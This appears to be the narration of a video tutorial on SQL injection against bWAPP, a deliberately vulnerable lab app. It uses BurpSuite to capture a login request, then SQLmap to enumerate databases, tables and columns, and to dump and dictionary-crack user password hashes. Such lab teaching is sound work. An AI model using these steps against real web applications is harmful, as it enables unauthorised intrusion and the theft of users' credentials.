In this video guide, we’ll be covering the basics of using SQLmap to launch a SQL injection attack. SQL injections can be devastating if they successfully exploit this vulnerability. We’ll be utilizing BurpSuite in this walkthrough, so make sure you’re familiar with BurpSuite before you try this; you might want to use our BurpSuite guide first.

In this demonstration, we’ll go through how to SQL inject with SQL map in 4 steps:

Step 1 – Set-up a SQL Injection with BurpSuite In this video we’ll be using a test environment with the IP address 10.1.1.102. Open up BurpSuite and, under the proxy tab, set Intercept to off. Then, in the web browser that has Burp set up as its proxy, we’ll log in with the user-name and password that we acquired – so Bee and Bug. The drop down menu that we’re presented with needs to be set to SQL injection against the Login/User. We’re now presented with a traditional log in form. We need to prime a SQL injection, and, to start, we’ll need to enter SQL code in the username login. We use the apostrophe as it’s a de-limiting character within SQL. If we put multiple apostrophes we can attempt to see if we can set up an error-based SQL injection. Now, select Login. We should receive an error back which means that there’s an error in the SQL syntax identifying that there’s a potential for SQL injection. We now want to utilize Burpsuite again, so let’s type test and test in the username and password fields. If we reopen BurpSuite, open the Proxy tab, switch Intercept on and then select Log In within the log in form on the Web App. Burpsuite should now intercept the login information within the Raw tab. We’ll now utilize this information within SQLmap. 

Step 2 – Using SQL map for SQL injection We now need to prime SQL map for the injection by taking the intercept information and saving it for SQL map to use. Highlight the information within the raw tab, then right click. Then select copy to a file, and within the Home Folder. We’ll set the file name to be SQLI for SQL Injection, then select save. This saves us copying long strings of code, as SQLmap can utilize files. Next, open up the terminal. We’ll now launch SQL map by typing in SQLmap, and we’ll get it to use a file by using – R (which tells SQLmap that we want to use a file). We’ll then tell it to use the file SQLI. We can get SQL map to search for databases to find within the log in form that we’re using, so we’ll get it to search for databases by typing --dbs. SQLmap has now begun it’s injection of the webapp. After a moment, it has found databases.

Step 3 - Specifying SQL Injections. We can see that the injection has found a more specific type of database, a Database management system, or DBMS. It specifies that this is written in MySql. We can use this information to delve further with the injection. Let’s expand on our previous command; we can save time by selecting up to recall the command. We can now specify the DBS to DBMS. As we know the DBMS is MySQL, specify this by typing MySQL. As we know that the web application is call bwapp, we can get SQLmap to look for the databases linked to the webapp by typing – Capital D, bwapp. We’ll then have a look for any tables within the database by typing --tables. Then, if we select enter, this will send SQLmap away again. After a short time, SQL map will come back with more information. The injection has found 5 tables within the web app; blog, heroes, movies, users and visitors. We can use SQL map to now look further into these tables. We’re going to look in the User table as that’s likely to house compromising data. So, if we recall our previous command again, and then further specify a table by typing –T, and then typing Users, we can look at these fields within the User table. We can further specify within these tables to look at the columns by typing --columns. SQL Map has returned the data that we’re looking for – it’s found email addresses, ID logins, and passwords. However, the passwords are hidden – they’ve been hashed (scrambled to avoid reading). and showing as varchar, for variable characters.

Step 4 – Cracking the Hacked Data. If the passwords are hashed, SQLmap can attempt to un-hash them. We now recall the previous command, remove the column section, and type in –dump. This tells SQLmap to attempt to discover the passwords. It will ask if you want to pass the information to another application; we’ll respond by selecting N for no. It will then ask if we want to do a dictionary attack – the process of using a list of words to discover the password. We’ll respond by selecting yes. After a moment, SQLmap will present the cracked passwords in human readable format.

In 4 steps we have managed to compromise this web application.